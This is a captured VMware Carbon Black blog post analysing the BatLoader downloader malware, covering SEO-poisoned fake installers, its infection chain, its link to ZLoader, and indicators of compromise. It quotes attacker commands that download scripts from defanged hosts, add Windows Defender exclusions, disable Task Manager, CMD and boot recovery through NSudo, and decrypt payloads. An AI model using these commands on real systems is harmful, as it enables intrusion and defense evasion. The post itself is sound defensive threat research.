blogs.vmware.com
Open in
urlscan Pro
2a02:26f0:1700:78e::2ef
Public Scan
URL:
https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html
Submission: On November 16 via api from DE — Scanned from DE
Submission: On November 16 via api from DE — Scanned from DE
Form analysis 1 forms found in the DOM
GET https://blogs.vmware.com/security/
<form class="search-form" method="get" action="https://blogs.vmware.com/security/">
<label class="sr-only" for="s">Search</label>
<input class="search-field" placeholder="Search" name="s">
<input type="submit" value="Submit Search" class="search-submit btn">
</form>Text Content
Menu VMware Security Blog
Search
Search
* VMware Blogs
* Communities
* Tech Zone
* Featured
Announcements
WHY CISOS SHOULD INVEST MORE INSIDE THEIR INFRASTRUCTURE
Tom Gillis June 2, 2022 5 min read
Threat Analysis Unit
SERPENT - THE BACKDOOR THAT HIDES IN PLAIN SIGHT
Threat Analysis Unit April 25, 2022 11 min read
Executive Viewpoint
HOW NOT TO BUILD A SOC
Martin Holzworth April 18, 2022 14 min read
Executive Viewpoint
PODCAST: DISCUSSING THE LATEST SECURITY THREATS AND THREAT ACTORS - TOM
KELLERMANN (VIRTUALLY SPEAKING)
Editorial Staff April 13, 2022 1 min read
* CategoriesToggle submenu
* Announcements
* Executive Viewpoint
* Multi-Cloud Security
* Modern Apps Security
* Workload Security
* Endpoint Security
* Network Security
* Threat Analysis Unit
* VMware Security Response Center
* VMware Security
* Get A Demo
Threat Intelligence
BATLOADER: THE EVASIVE DOWNLOADER MALWARE
Bethany Hardin, Lavine Oluoch, Tatiana Vollbrecht November 14, 2022 35 min read
Share on:
* Share on Twitter
* Share on LinkedIn
* Share on Facebook
* Share on Reddit
* Email this post
* Copy Link
Contributors: Deborah Snyder and Nikki Benoit
EXECUTIVE SUMMARY
VMware Carbon Black Managed Detection and Response (MDR) analysts are constantly
handling security incidents within our customer environments and tracking
emerging and persistent malware campaigns. One such threat that has been
particularly prevalent over the last couple of months is BatLoader. Named by
Mandiant [1], BatLoader is an initial access malware that heavily uses batch and
PowerShell scripts to gain a foothold on a victim machine and deliver other
malware. The threat actors utilize search engine optimization (SEO) poisoning to
lure users to download the malware from compromised websites. The use of
living-off-the-land binaries makes this campaign hard to detect and block
especially early on in the attack chain.
In this article, we will explore this malware campaign, addressing the history
of BatLoader, its attributes, how it is delivered, the infection chain, and
Carbon Black’s detection of the malware.
ATTRIBUTES AND ATTRIBUTION
There are several attributes that are unique to BatLoader’s attack methodology
that Carbon Black’s MDR team has seen in infected customer environments. The
following can be used as a fingerprint to identify the malicious files (based on
the OLE file information provided by VT):
Author Signer Subject Softland MK Investment Properties Novapdf 11 tools Test
Tax In Cloud sp. z o.o. SetupProject1 Cloud Kancelaria Adwokacka Adwokat
Aleksandra Krzemińska Cloud
Table 1: OLE File information for identified Batloader samples
Other fingerprints pulled from the code can also be used to identify BatLoader
files:
1 Set-Location “$Env:USERPROFILE\AppData\Roaming”
Invoke-WebRequest hxxtps://updatea1[.]com/g5
2 Set-Location “$Env:USERPROFILE\AppData\Roaming”
Invoke-WebRequest hxxp://cloudupdatesss[.]com
While researching BatLoader, the team discovered several attributes within the
attack chain that are similar to previous activity linked to Conti. Evidence
collected includes an IP address (134[.]0[.]117[.]195 – firsone1[.]online) that
was previously used by Conti in a ransomware campaign leveraging Log4J [2], as
well as techniques that Conti has used in other attacks. One of the techniques
identified was the use of the Atera agent which has similarities to Conti’s
previous techniques for their ransomware operations. Mandiant had previously
released research on BatLoader and commented that activity from BatLoader
overlaps with techniques that were released with Conti’s leaks in August 2021
[1].
This is not to say that Conti is responsible for BatLoader. Unaffiliated actors
may be replicating the techniques of the group, especially since the Conti Leaks
of August 2021. Interestingly, Carbon Black’s MDR and Threat Analysis Unit
(TAU) team did not find BatLoader being sold on the dark web, suggesting this
may be a campaign by a single actor/group and not being sold as a service.
BATLOADER VS ZLOADER
While researching the pre-existing information on BatLoader published on the
public internet, there seemed to be some confusion as to whether BatLoader and
Zloader, a banking trojan, are one and the same. For example, looking up this
file on VirusTotal we see that different antivirus engines group it in the
Zloader malware family. The same file has been referenced in
community-contributed IOC collections for both Zloader and Batloader.
Figure 1: Malware family analysis for a ZLoader Sample from VT
Thought to be derived from the Zeus banking trojan from the early 2000s, the
Zloader malware has been observed in hundreds of campaigns over the years,
evolving over time and improving its effectiveness against its targeted victims
[3]. In 2021, security researchers reported a change in Zloader’s delivery
method as well as key changes in its attack chain. The malware operators moved
away from phishing email campaigns (more information can be found in TAU-TIN
ZLoader) and we’re now using malicious advertisements to lure users to download
signed Windows installer (.msi) files. These file downloads are disguised as
installers for legitimate software such as TeamViewer, Zoom, Discord, JavaPlugin
etc. Once installed, Zloader uses batch scripts to progress in the attack chain
using the following tactics:
* elevating privileges
* evading defenses by disabling Defender using Nsudo
* establishing persistence
* downloading additional payloads using the PowerShell cmdlet
Invoke-WebRequest.
Finally, the threat actor leverages CVE-2013-3900 and CVE-2020-1599 to execute a
malicious script appended to a signed Windows dll that injects the main Zloader
dll into an msiexec.exe process. Msiexec.exe then maintains communication with
the C2 server. In April 2022, Microsoft’s Digital Crime Unit (DCU) took down
over 60 domains that were controlled by the threat actor group behind ZLoader,
disrupting their botnet [4].
In many ways, Batloader draws familiarity from the previously known ZLoader. Our
team analyzed the initial steps of compromise utilizing the two malware samples
presented in the chart below to provide an accurate comparison.
Malware File Name SHA-256 Hash BatLoader zoom.msi
3ec3c66c0099682250fe06db400f42ec7be9a0f4641eaad8473ccd8b28a48042 ZLoader
zoom.msi / Team-viewer.msi
2c0d8fc0740598fa97c5d1b21edb011c8026740b77029d29c20f3275438ebfbd
Where these two malware types draw substantial similarities is through their use
of SEO poisoning, leveraging Windows Installer, and their use of the native OS
binaries during the attack delivery process.
Figure 2: Powershell command from Zloader & Batloader samples
With these similarities, we cannot conclude that these malware variants are
entirely separate from each other, and of further note, some of the collected
samples of Batloader and ZLoader both had an identical creation date and time
within the file’s OLE metadata.
Figure 3: OLE comparison for Batloader and ZLoader Hash from VirusTotal
Despite the resemblance between Batloader and Zloader, there are some
differences worth noting. On average, Batloader samples are larger at ~107 MB
while ZLoader is only about ~705 KB. This is consistent with the amount of
activity that is seen with Batloader from the start.
While it could not be verified whether or not the two malware variants are
linked to the same threat actors, based on the used malicious code and shifts in
attack delivery methods, our team’s findings align with Walmart [5] and Mandiant
[1] that BatLoader is indeed an extension beyond ZLoader.
Figure 4: Comparing ZLoader (most recent campaign) and BatLoader attack chain
BATLOADER DELIVERY
Note: Batloader continues to evolve and we have seen different execution steps
from different samples. Although the core functionality remains the same, the
malware operators use different scripts (both in name and content) possibly to
make detection more difficult. For simplicity, we only analyzed one of the three
variations we encountered. The IOC section below lists scripts and tools used in
all the different attack chains.
The operators of BatLoader malware leverage SEO poisoning to lure potential
victims into downloading malicious Microsoft Windows Installer (.msi) files.
The msi files can either be directly downloaded, often found in the /Downloads
folder or are included in a .zip archive file. The files masquerade as other
common legitimate software installers – e.g. zoom.msi, Teamviewer.msi,
anydesk.msi – but are actually a copy of the free PDF creator novaPDF. The
novaPDF installer is edited using the tool Advanced Installer to add a
PowerShellScriptInline custom action that executes a malicious PowerShell
script. More on how to create PowerShell custom actions with Advanced Installer
can be found here.
Figure 5: Zoom.msi custom action
The PowerShell inline script kicks off the infection when executed during
software installation, downloading the first BatLoader script, update.bat using
the cmdlet Invoke-WebRequest as shown in Figure 6.
Figure 6: PowerShellScriptInline custom action data represents the PowerShell
code
Figure 7: Extracted PowerShell code
INFECTION CHAIN
The infection chain relies on batch scripts and PowerShell scripts written to
the \appdata\roaming directory to gain initial access. update.bat downloads
requestadmin.bat and nircmd.exe, a command line utility that can be used to gain
admin privileges with the “elevate” and “elevatecmd” switches.
Figure 8: Contents of Update.bat
Nircmd.exe and the initial zoom.msi file are both signed with the same
certificate. We have identified three file signatures related to BatLoader files
at the time of writing this:
* MK Investment Properties Inc.
* Kancelaria Adwokacka Adwokat Aleksandra Krzemińska
* Tax in Cloud sp. Z o.o
With elevated privileges, requestadmin.bat downloads and executes
runanddelete.bat and scripttodo.ps1. For defense evasion, requestadmin.bat also
adds exclusions for Windows Defender as listed below:
* Add-MpPreference -ExclusionProcess ‘C:\Users\<user>\AppData\Roaming‘
* Add-MpPreference -ExclusionPath ‘C:\Users\<user>\AppData\Roaming\’
* Add-MpPreference -ExclusionPath ‘C:\Users\<user>\‘
* Add-MpPreference -ExclusionProcess ‘C:\Users\<user>‘
* Add-MpPreference -ExclusionProcess ‘C:\Windows*‘
* Add-MpPreference -ExclusionExtension “.ps1″”
* Add-MpPreference -ExclusionPath ‘C:\Users\<user>‘\AppData\Local\Temp\*’
* Add-MpPreference -ExclusionProcess ‘C:\Users\<user>\AppData\Local\Temp\*’
The PowerShell script scripttodo.ps1 runs some discovery commands as well as
downloading and installing a copy of Gpg4win (an email and file encryption
package) and Nsudo.exe, a tool used to launch programs with elevated privileges.
* computersystem get domain
* arp.exe -a
Gpg4win is then used to decrypt more payloads.
* “C:\Program Files (x86)\GNU\GnuPG\gpg2.exe” –batch –yes –passphrase 105b -o
C:\Users\<user>\AppData\Roaming\d2ef5.exe -d
C:\Users\<user>\AppData\Roaming\d2ef5.exe.gpg
* “C:\Program Files (x86)\GNU\GnuPG\gpg2.exe” –batch –yes –passphrase 105b -o
C:\Users\<user>\AppData\Roaming\p9d2s.exe -d
C:\Users\<user>\AppData\Roaming\p9d2s.exe.gpg
* “C:\Program Files (x86)\GNU\GnuPG\gpg2.exe” –batch –yes –passphrase 105b -o
C:\Users\<user>\AppData\Roaming\f827.dll -d
C:\Users\<user>\AppData\Roaming\f827.dll.gpg
* “C:\Program Files (x86)\GNU\GnuPG\gpg2.exe” –batch –yes –passphrase 105b -o
C:\Users\<user>\AppData\Roaming\d655.dll -d
C:\Users\<user>\AppData\Roaming\d655.dll.gpg
Figure 9: Contents of runanddelete.bat from VT
Nsudo is used to impair defenses by adding the registry values
ConsentPromptBehaviorAdmin ,Notification_Suppress, DisableTaskMgr, DisableCMD
and DisableRegistryTools. These configurations restrict user access on the
infected device making remediation difficult.
Nsudo -U:T sc config WinDefend start= disabled
NSudo -U:T -ShowWindowMode:Hide reg add
“HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System” /v
“ConsentPromptBehaviorAdmin” /t REG_DWORD /d “0” /f
NSudo -U:T -ShowWindowMode:Hide reg add
“HKLM\Software\Policies\Microsoft\Windows Defender\UX Configuration” /v
“Notification_Suppress” /t REG_DWORD /d “1” /f
NSudo -U:T -ShowWindowMode:Hide reg add
“HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System” /v
“DisableTaskMgr” /t REG_DWORD /d “1” /f
NSudo -U:T -ShowWindowMode:Hide reg add
“HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System” /v “DisableCMD”
/t REG_DWORD /d “1” /f
NSudo -U:T -ShowWindowMode:Hide reg add
“HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System” /v
“DisableRegistryTools” /t REG_DWORD /d “1” /f
NSudo -U:T -ShowWindowMode:Hide reg add
“HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer” /v “NoRun” /t
REG_DWORD /d “1” /f
Nsudo -U:T -ShowWindowMode:Hide bcdedit /set {default} recoveryenabled No
Nsudo -U:T -ShowWindowMode:Hide bcdedit /set {default} bootstatuspolicy
ignoreallfailures
Requestadmin.bat also uses powercfg.exe to modify power settings on the infected
device by configuring the lock screen timeout.
powercfg.exe /SETACVALUEINDEX SCHEME_CURRENT SUB_VIDEO VIDEOCONLOCK 1800
powercfg -change -standby-timeout-dc 3000
powercfg -change -standby-timeout-ac 3000
Batloader has also been observed installing remote monitoring software such as
Servably’s Syncro and Atera RMM. This ensures the malware operators maintain
access to the infected systems.
The final payloads dropped after infection often include two executables (e.g.
d2ef5.exe, p9d2s.exe) and a DLL file (e.g. f827.dll, d655.dll). Within each of
the infections we observed, one of the executable files was a known bad
attributed to the Ursnif/Gozi malware family, a banking trojan. The other
appeared to be Arkei/Vidar infostealer. Once these executables are set to run,
the main dll is also executed. In some incidents, we were able to confirm that
the dll was a Cobalt Strike stager.
Figure 10: Final DLL payload executed
VMWARE CARBON BLACK MDR RESPONSE
New threats are constantly emerging. At VMware Carbon Black we work around the
clock to ensure that our products keep our customers safe from those very
threats and offer MDR, the last wall of defense, to fill the gap between the
known, evolving and unknown threats.
Batloader is a great example of the benefit of our MDR product. As our team has
detailed, this malware variant is much stealthier and embeds itself quite
thoroughly within the impacted host device. The Carbon Black sensor is able to
detect specific behaviors of the malware and generate alerts for further
analysis. The alerts in themselves did not paint a holistic picture of the
attack. This would be a challenge for any team that does not have the resources
to conduct an in depth threat hunt such as those provided by MDR.
The Endpoint Standard product receives updates for known malicious hashes and
blocks all types of Known or Suspect malware files from executing through
behavioral analysis. While the initial payload may be able to circumvent
detection, it is highly likely that when the malware runs it will trigger other
alerts that are indicators of a more complex attack, such as the ones
highlighted below.
Figure 11: Alert triggered by requestadmin.bat artifact from Batloader malware
Figure 12: Alert triggered by the d2ef5.exe artifact from Batloader malware
MDR Threat Analysts detected this change in tactics and initiated the
investigation that has brought us to this point of highlighting the nuances and
vital differences between Batloader and Zloader and how it could impact our
customer environments. The discovered IOCs related to this malicious behavior is
documented to ease the next steps for our customers with Threat Analysts always
available for follow-up questions and support.
CONCLUSION
BatLoader’s stealth and persistence are what made this malware stand out from
the rest during its latest campaign. The MDR team has been highly successful in
detecting these attacks, utilizing the written detections within the Carbon
Black sensor and carefully crafted queries that would confirm whether or not the
malware is related to BatLoader. As this variant has a focus on persistence, if
it was able to successfully infect the host, it would be vital to perform the
necessary analysis to fully remove the malware or restore from a known good
backup.
Observed as early as July of 2022, this malware has already become commonplace
as a threat against Carbon Black MDR customers. The following diagram
illustrates its prevalence across different sectors, with business and financial
services being prime targets. Since it was first observed by the VMware Carbon
Black team there have been at least three waves of infection to date with more
to be expected.
Figure 13: Attack prevalence across industries as seen by Carbon Black
This proves once again that as the threat landscape continues to change, the
security industry as a whole needs the tools, knowledge, and collaboration to be
able to detect and block the latest discovered techniques. Here at VMware
Carbon Black, the MDR team and TAU heavily rely on communication and
collaboration to ensure that our products are able to stand against these
threats as they continue to evolve in a timely manner. Our teams measure our
success through our ability to adapt and persevere on this ever-changing
battlefield.
INDICATORS OF COMPROMISE (IOCS)
Indicator Type Context
3ec3c66c0099682250fe06db400f42ec7be9a0f4641eaad8473ccd8b28a48042 SHA-256
zoom.msi 15c39d2084e399b4a0126c0b1026bd2342f8dc5d812cf0d0caae8e35ee689407
SHA-256 anydesk.msi
d0d53132fc9db8c4829769e222d70f25db9740239ac898ee30fad4a89a1197e5 SHA-256
ndp48-x86-x64.msi
661989f7dedd6a9bd37a69a3c80d6b308b1c704262e8bfc49ea5df45dbd0fce0 SHA-256
putty12.1.msi 9f017523e594c20c536e14b8c3a9bf5932c8a8853b5bdda4e16e9fbd251c72b5
SHA-256 ndp48-x86-x64.msi
bbbd869ada2a931528437ddfb1626f9705867036131f20db7a9b09318e593638 SHA-256
setup_iid_1c7a5958-03ff-4772-915d-8281b496fe116_14.msi
eed32513227a87faa2439b2217df1c965f9d5cbbf2e3a2b5bac1322c634038da SHA-256
zoominstaller70.0.msi
0c2c349c4f1c420d9810a7a6870d19558542ae9b7233cd4e5ce2142bf381d6b4 SHA-256
audacity-win12.6.msi
1d28ab9852d42bdf12599fd612691a8a68d73b03d80ddcd7aebf49dad2ea05b5 SHA-256
installerv9.0.msi
3ef74a6f1e2372daffc3ef4c98e0b9bb08e22a684c2d1bb8007eb2ba372654a2 SHA-256
zoominstaller65.0.msi
2a33d171c7b46d2905e1a2a2ac8e2e29a70b811e6ab9cc0c06c06897761e07a0 SHA-256
installerv8.4.msi
2ade09e144760d229a01b8f0c53ce60586f11c449e6fbfccd2fcf72e2cc6a484 SHA-256
zoominstaller68.0.msi
5fac5e0e79369db0b39346160644d5c29f88ed615e03c947116240f5fc5b05a1 SHA-256
installerv20.6.msi
acdbd6901ecb04106e7427af8602ac8473042b86f15a36bbdbd6bf04010b0602 SHA-256
zoominstaller60.7.msi
7ba7e1084c6fd760db2ef90fd00177fa72fad00286c39f8f13b52f34adbf9a2c SHA-256
zoominstaller60.5.msi
ded683fa45879dc8c1b702122dd46d6eeb234972367a0015b0207d7540a9c1fc SHA-256
installerv8.4.msi
e7c5fc948cfe3ff394d1ff9712995a77add82a5c507ce98debc722c06e3f1334 SHA-256
installerv9.0.msi
366151721ca41fe0227d34bbd3eda544774df24fb7d00c62dcd119519f8b9782 SHA-256
installerv20.9.msi
1faf88c503380c21f4817d8f2d41d62954be114233750223824b2757aa8d2d81 SHA-256
installerv40.1 (117).msi
4a27ced8592150fc2c74f3826cca90988633eb8f8723655152df521f88a039df SHA-256
installer36.5 (38).msi
89e1a688f88b38f256c9c17d0bcf5ecd12428a845e136d10a9a13579018e076f SHA-256
installer36.5 (37).msi
e59c2defd5a04095a36b8ffd8893f694bcf8583bf967958a4a41d7161871d399 SHA-256
installer36.5 (4).msi
dc6b6e1812f41c80ee67a72ebcb7a999488c866d805354936fb7506667005b43 SHA-256
pssabfa.ps1 5107ee907be6011f76a1e984a12ae2f56ccf6329cba7243ef9f2b50198839193
SHA-256 update.bat
2a9df5806d4af0072cb6f76c7d8ebcde7fca51a0ee13f609f5a492c78d449080 SHA-256
update.bat 1dc84699521090843fc320deccf157537de7eae6d52db4f78acde01bc106a90c
SHA-256 update.bat
1fd5bbe5af7a7dcc52d5ea12e4d32c4818b2ef482de18f6c1b7cfda0986b1ee2 SHA-256
update.bat 447ec30c17c97fa67a21477e48aa66d6228ec46f604d8679fd4021d134cca7f8
SHA-256 update.bat
39b771a51c479187d089b9e42d67b6cee24607e197ba75549e9dad58163bc595 SHA-256
avolkov.exe af64e4bccc5652b8f780e39e7e27d2d1f27b0395e0c646d4953b354b70eb54bf
SHA-256 newtest.bat
9b6c2ed7ace21dc83cbd46b08acd3f73460c70735568e9fbd7bd7c8868cd8d27 SHA-256
user.ps1 591aa2607abc384c66d1532c1b6d4cc3d4052108245b03e3b6fea19a207c13d5
SHA-256 user.ps1
528e2be7188d1b337d0691b5c21618425afdb594139205accd2137313bbf1cfe SHA-256 mun.ps1
0911be79c918c04b7409f8cb5964f5dfed327f1f23fd326011a217987bdcb5f8 SHA-256 ru.ps1
04be8439fabc28959d7c109521e9eb4854f2a24402aacc4c3fb981e286fb5fa2 SHA-256
checkav.ps1 c737c388bab2b626e6a71eb8c2d8c68f2aca78e183233ea9a7c8e3fb1240ce94
SHA-256 checkav.ps1
e9282d53092385c81dec89bb99e9394e77c1ecce6ca20340b360bd46b146bf9f SHA-256
checkav.ps1 216047c048bf1dcbf031cf24bd5e0f263994a5df60b23089e393033d17257cb5
SHA-256 nircmd.exe
a6d46ae0d796fd3f90364058d67947f9caa2b7c75aa3b1695bbe10406ea1356c SHA-256
nircmd.exe ae43e9e943e21ce2f7bd1db0c17f1ba8fd9b4d0fbd2a26f947627f19b0268da2
SHA-256 requestadmin.bat
96a82b93dd26cc7126c07403c8a1689b9407dd37459c7935cab8ea6c528a219a SHA-256
requestadmin.bat
a390f289566d2cf19f9afcad9b51497925e910e38068c2059896f15bbe3bcee7 SHA-256
requestadmin.bat
161302d0fa5608fe7f2cb81d84af309fa2e3aed09b46c548116f0155af396f80 SHA-256
requestadmin.bat
342b398647073159dfa8a7d36510171f731b760089a546e96fbb8a292791efee SHA-256
runanddelete.bat
5cd720b63b8383ed6cc3f3f97954bd029120cdf34b23bf222cd8af3f048b112b SHA-256
scripttodo.ps1 3c05ba5d8579c7684d799898e97861691a7828bed48a1e6261b2e1cd550fe275
SHA-256 scripttodo.ps1
4cd00234b18e04dcd745cc81bb928c8451f6601affb5fa45f20bb11bfb5383ce SHA-256
scripttodo.ps1 dd3e298fa01b7a035ed28b5649b4a7656be11c5a4c5dbb57b4919f4e9d837cb8
SHA-256 scripttodo.ps1
7d621bfbe4b32647abcd8216cd65be56aaf68d674bedc1094519562a8604a0e0 SHA-256
scripttodo.ps1 8e068fdc1deb02dc8056215fe3c400185845742d0227af7923483f891d62516c
SHA-256 scripttodo.ps1
d62f9aa79ce6a406a6e5f13cd47fd1127c1f743010871724870e124ce57898f3 SHA-256
scripttodo.ps1 19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618
SHA-256 nsudo.exe
43894c287c3ebccd30cd761dd4826518073773180ae0ab28355d604b44071441 SHA-256
gpg4win-2.2.5.exe
208d26c07914e54a5f1575d3720effb6b04cded65942a500d000bef2ce4e5843 SHA-256
gpg2.exe a5af9aac1a7675fd3e3da75508d67d33827ae43b1f42dbdefc0d9a62915fa775
SHA-256 shutdowni.bat
bc98d852e5e1662ae8ca1f95b1d1d49f61c6b64024af04b1e4665d0247ec1de5 SHA-256
f827.msi (AteraAgent)
3503b5ca3d8070342d1f3c49efa44fd14d7f773f51d3bd5b1ded1aa19f9ed3e7 SHA-256
AteraAgent 5654f32a4f0f2e900a35761e8caf7ef0c50ee7800e0a3b19354b571bc6876f61
SHA-256 f827.exe
(Syncro RMM)
9f3afef4b3a589c4685f39d887725a664ec0fe78091069550402365e589f9d22 SHA-256
d2ef5.exe 1056ea3dad265dd554362bc0bd67f08fa2b9f3e5839e6e4fb197831a15c8acef
SHA-256 d2ef5.exe
28a57a6a28080eb1374d88cca07b38fb645c558ad30d4d51929d8567dedf5021 SHA-256
d2ef5.exe c1c4adf68455620082889b4c8576110441f6f2c7876240bc3f41f5cea8050370
SHA-256 d2ef5.exe
1be4782dc3839c4ab537b7d5ce80601334de1d84f4be455db7c80b4ae3ec51ce SHA-256
p9d2s.exe 72504c07e6105b70500519f3bcf718d3113624560c5594e87c08a4efc2e2a1a8
SHA-256 p9d2s.exe
22d5bac1b0cad7ee531f4a156dda677d1cb52ec6512154d42e7bdcef5cc9cc48 SHA-256
p9d2s.exe b8f294bb3793eee72ab2d2bc436b18fe1c111704405688b43b686f83f0f0b8d0
SHA-256 p9d2s.exe
9cead0a2b8d586a8e2edde7aefe1e106a9894a95f9b251746442c7fbfe99df61 SHA-256
p9d2s.exe 1fe47cac924700a847e669f1d968d73d08fcd39fc3fa03f63035d78769374a40
SHA-256 d655.dll
1b277b89ee84148bd5beebcbdb69b9e5f82f3ce4d1dec4b459217323aec7fd60 SHA-256
d655.dll 54e844b5ae4a056ca8df4ca7299249c4910374d64261c83ac55e5fdf1b59f01d
SHA-256 f827.dll
1daef45653406893cf3f53e0b80f4aa9c83d6a0e8288bd4c5f7e0318096621a0 SHA-256
installv2.dll 89.108.65[.]136 IP Address updatea1[.]com 146.112.61[.]107 IP
Address updatea1[.]com 194.67.110[.]215 IP Address externalchecksso.com
194.67.119[.]190 IP Address cloudupdatesss[.]com 194.135.24[.]245 IP Address
teenieshopus[.]com 139.60.161[.]74 IP Address liversofter.com
REFERENCE LIST
[1] N. C. Kiat, A. Del Rosario, M. Co. “Zoom For You — SEO Poisoning to
Distribute BATLOADER and Atera Agent.” Mandiant.
https://www.mandiant.com/resources/blog/seo
-poisoning-batloader-atera (accessed October, 2022).
[2] L. Ilascu. “Conti ransomware uses Log4j bug to hack VMware vCenter
servers.” Bleeping Computer.
https://www.bleepingcomputer.com/news/security/conti-ransomware-
uses-log4j-
bug-to-hack-vmware-vcenter-servers/
[3] D. Schwarz, M. Mesa, Proofpoint Research Team. “ZLoader Loads Again: New
ZLoader Variant Returns.” Proofpoint.
https://www.proofpoint.com/us/blog/threat-insight/zloader-loads-
again-new-zloader-variant-returns (accessed October, 2022).
[4] A. Hogan-Burney. “Notorious cybercrime gang’s botnet disrupted.”
Microsoft.
https://blogs.microsoft.com/on-the-issues/2022/04/13/zloader-botnet-disrupted-malware
-ukraine/ (accessed October, 2022).
[5] J. Reaves, J.Platt. “Revisiting BatLoader C2 structure.” Walmart Global
Tech Blog.
https://medium.com/walmartglobaltech/revisiting-batloader-c2-structure-52f46ff9893a
(accessed October, 2022)
BETHANY HARDIN
LAVINE OLUOCH
TATIANA VOLLBRECHT
RELATED ARTICLES
Endpoint Security
ENDPOINT PROTECTION IS KEY WHEN IT COMES TO CYBER INSURANCE
Karen Worstell November 2, 2022 4 min read
Threat Analysis Unit
ESXI-TARGETING RANSOMWARE: TACTICS AND TECHNIQUES (PART 2)
Oleg Boyarchuk, Giovanni Vigna, Stefano Ortolani October 28, 2022 22 min read
Threat Analysis Unit
LOCKBIT 3.0 RANSOMWARE UNLOCKED
Dana Behling October 15, 2022 35 min read
×
Company
About Us Executive Leadership News & Stories Investor Relations Customer Stories
Diversity, Equity & Inclusion Environment, Social & Governance
Careers Blogs Communities Acquisitions Office Locations VMware Cloud Trust
Center COVID-19 Resources
Support
VMware Customer Connect Support Policies Product Documentation Compatibility
Guide End User Terms & Conditions California Transparency Act Statement
Twitter YouTube Facebook LinkedIn Contact Sales
--------------------------------------------------------------------------------
© 2022 VMware, Inc. Terms of Use Your California Privacy Rights Privacy
Accessibility Site Map Trademarks Glossary Help Feedback
Cookie Settings
We use cookies to provide you with the best experience on our website, to
improve usability and performance and thereby improve what we offer to you. Our
website may also use third-party cookies to display advertising that is more
relevant to you. By clicking on the “Accept All” button you agree to the storing
of cookies on your device. If you want to know more about how we use cookies,
please see our Cookie Policy.
Cookie Settings Accept All Cookies
COOKIE PREFERENCE CENTER
GENERAL INFORMATION ON COOKIES
GENERAL INFORMATION ON COOKIES
When you visit our website, we use cookies to ensure that we give you the best
experience. This information does not usually directly identify you, but it can
give you a more personalized web experience. Because we respect your right to
privacy, you can choose not to allow some types of cookies by clicking on the
different category headings to find out more and change your settings. However,
blocking some types of cookies may impact your experience on the site and the
services we are able to offer. Further information can be found in our
Cookie Policy.
* STRICTLY NECESSARY
STRICTLY NECESSARY
Always Active
Strictly Necessary
Strictly necessary cookies are always enabled since they are essential for
our website to function. They enable core functionality such as security,
network management, and website accessibility. You can set your browser to
block or alert you about these cookies, but this may affect how the website
functions. For more information please visit www.aboutcookies.org or
www.allaboutcookies.org.
Cookie Details
* PERFORMANCE
PERFORMANCE
Performance
Performance cookies are used to analyze the user experience to improve our
website by collecting and reporting information on how you use it. They allow
us to know which pages are the most and least popular, see how visitors move
around the site, optimize our website and make it easier to navigate.
Cookie Details
* FUNCTIONAL
FUNCTIONAL
Functional
Functional cookies help us keep track of your past browsing choices so we can
improve usability and customize your experience. These cookies enable the
website to remember your preferred settings, language preferences, location
and other customizable elements such as font or text size. If you do not
allow these cookies, then some or all of these services may not function
properly.
Cookie Details
* ADVERTISING
ADVERTISING
Advertising
Advertising cookies are used to send you relevant advertising and promotional
information. They may be set through our site by third parties to build a
profile of your interests and show you relevant advertisements on other
sites. These cookies do not directly store personal information, but their
function is based on uniquely identifying your browser and internet device.
Cookie Details
* SOCIAL MEDIA
SOCIAL MEDIA
Social Media
Social media cookies are intended to facilitate the sharing of content and to
improve the user experience. These cookies can sometimes track your
activities. We do not control social media cookies and they do not allow us
to gain access to your social media accounts. Please refer to the relevant
social media platform’s privacy policies for more information.
Cookie Details
Back Button
ADVERTISING COOKIES
Filter Button
Consent Leg.Interest
Select All Vendors
Select All Vendors
Select All Hosts
Select All
* REPLACE-WITH-DYANMIC-HOST-ID
View Third Party Cookies
* Name
cookie name
Clear Filters
Information storage and access
Apply
Confirm My Choices Allow All
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word
mmMwWLliI0fiflO&1
mmMwWLliI0fiflO&1
mmMwWLliI0fiflO&1
mmMwWLliI0fiflO&1
mmMwWLliI0fiflO&1
mmMwWLliI0fiflO&1
mmMwWLliI0fiflO&1